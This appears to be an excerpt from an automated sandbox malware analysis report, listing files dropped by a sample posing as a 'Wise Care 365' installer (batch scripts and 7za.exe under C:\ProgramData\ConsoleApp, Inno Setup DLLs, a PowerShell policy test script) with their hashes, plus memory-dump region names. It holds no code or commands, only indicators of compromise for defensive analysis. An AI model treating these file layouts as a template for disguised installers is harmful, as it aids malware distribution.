memory/3572-6-0x0000000000400000-0x000000000067B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\ProgramData\ConsoleApp\ControlSet000.bat
| MD5 | 484c8df5d5bd9d82f4ac1861472cf519 |
| SHA1 | eddc0d20c81d9dba14ee0be32c7c5f563481e792 |
| SHA256 | f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953 |
| SHA512 | 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7 |
C:\ProgramData\ConsoleApp\main.bat
| MD5 | 0ddc6dd98f86cff7e50c1621fd16b55a |
| SHA1 | 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a |
| SHA256 | b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6 |
| SHA512 | 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609 |
memory/2380-25-0x00000000033B0000-0x00000000033E6000-memory.dmp
memory/2380-26-0x0000000005B90000-0x00000000061B8000-memory.dmp
memory/2380-27-0x00000000059B0000-0x00000000059D2000-memory.dmp
memory/2380-28-0x00000000062C0000-0x0000000006326000-memory.dmp
memory/2380-29-0x0000000006330000-0x0000000006396000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1jgcp3q.1wi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2380-39-0x00000000064C0000-0x0000000006814000-memory.dmp
memory/2380-40-0x0000000006960000-0x000000000697E000-memory.dmp
memory/2380-41-0x0000000006980000-0x00000000069CC000-memory.dmp
memory/2380-42-0x0000000007F90000-0x000000000860A000-memory.dmp
memory/2380-43-0x0000000006E70000-0x0000000006E8A000-memory.dmp
C:\ProgramData\ConsoleApp\7za.exe
| MD5 | c3d309156b8e8cf1d158de5fab1c2b40 |
| SHA1 | 58ad15d91abac2c6203e389ac8a8ff6685406d41 |
| SHA256 | 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c |
| SHA512 | 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498 |
C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe
| MD5 | 05fda662bb382c2c95b9318b2394b246 |
| SHA1 | 69365314afb6102209a806e0e474d94e58207ec6 |
| SHA256 | 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2 |
| SHA512 | b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312 |
memory/888-51-0x0000000000400000-0x0000000000417000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp
| MD5 | 9d7850e858c24db77b91b25adf93812f |
| SHA1 | f0bb0a9074b38dad7492422247c0a316197d26b6 |
| SHA256 | c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8 |
| SHA512 | e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec |
memory/4256-67-0x00000000025B0000-0x00000000025C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-ABTGS.tmp\ISTask.dll
| MD5 | 86a1311d51c00b278cb7f27796ea442e |
| SHA1 | ac08ac9d08f8f5380e2a9a65f4117862aa861a19 |
| SHA256 | e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d |
| SHA512 | 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec |
C:\Users\Admin\AppData\Local\Temp\is-ABTGS.tmp\VclStylesInno.dll
| MD5 | b0ca93ceb050a2feff0b19e65072bbb5 |
| SHA1 | 7ebbbbe2d2acd8fd516f824338d254a33b69f08d |
| SHA256 | 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246 |
| SHA512 | 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2 |
memory/4256-73-0x00000000074A0000-0x00000000077BA000-memory.dmp
memory/4256-77-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-79-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-80-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-90-0x0000000007960000-0x0000000007961000-memory.dmp
memory/4256-98-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-101-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-100-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-99-0x0000000007990000-0x0000000007991000-memory.dmp
memory/4256-97-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-96-0x0000000007980000-0x0000000007981000-memory.dmp
memory/4256-95-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-94-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-93-0x0000000007970000-0x0000000007971000-memory.dmp
memory/4256-92-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-91-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-89-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-88-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-87-0x0000000007950000-0x0000000007951000-memory.dmp
memory/4256-86-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-85-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-84-0x0000000007940000-0x0000000007941000-memory.dmp
memory/4256-83-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-82-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-81-0x0000000007930000-0x0000000007931000-memory.dmp
memory/4256-78-0x0000000007920000-0x0000000007921000-memory.dmp
memory/4256-75-0x0000000007910000-0x0000000007911000-memory.dmp
memory/4256-76-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-103-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-130-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-102-0x00000000079A0000-0x00000000079A1000-memory.dmp
memory/4256-132-0x0000000007A40000-0x0000000007A41000-memory.dmp
memory/4256-131-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-129-0x0000000007A30000-0x0000000007A31000-memory.dmp
memory/4256-128-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-127-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-126-0x0000000007A20000-0x0000000007A21000-memory.dmp
memory/4256-125-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-124-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-123-0x0000000007A10000-0x0000000007A11000-memory.dmp
memory/4256-122-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-121-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-120-0x0000000007A00000-0x0000000007A01000-memory.dmp
memory/4256-119-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-118-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-117-0x00000000079F0000-0x00000000079F1000-memory.dmp
memory/4256-116-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-115-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-114-0x00000000079E0000-0x00000000079E1000-memory.dmp
memory/4256-113-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-112-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-111-0x00000000079D0000-0x00000000079D1000-memory.dmp
memory/4256-110-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-109-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-108-0x00000000079C0000-0x00000000079C1000-memory.dmp
memory/4256-107-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-106-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/4256-105-0x00000000079B0000-0x00000000079B1000-memory.dmp
memory/4256-104-0x00000000077C0000-0x0000000007900000-memory.dmp
memory/3572-147-0x0000000000400000-0x000000000067B000-memory.dmp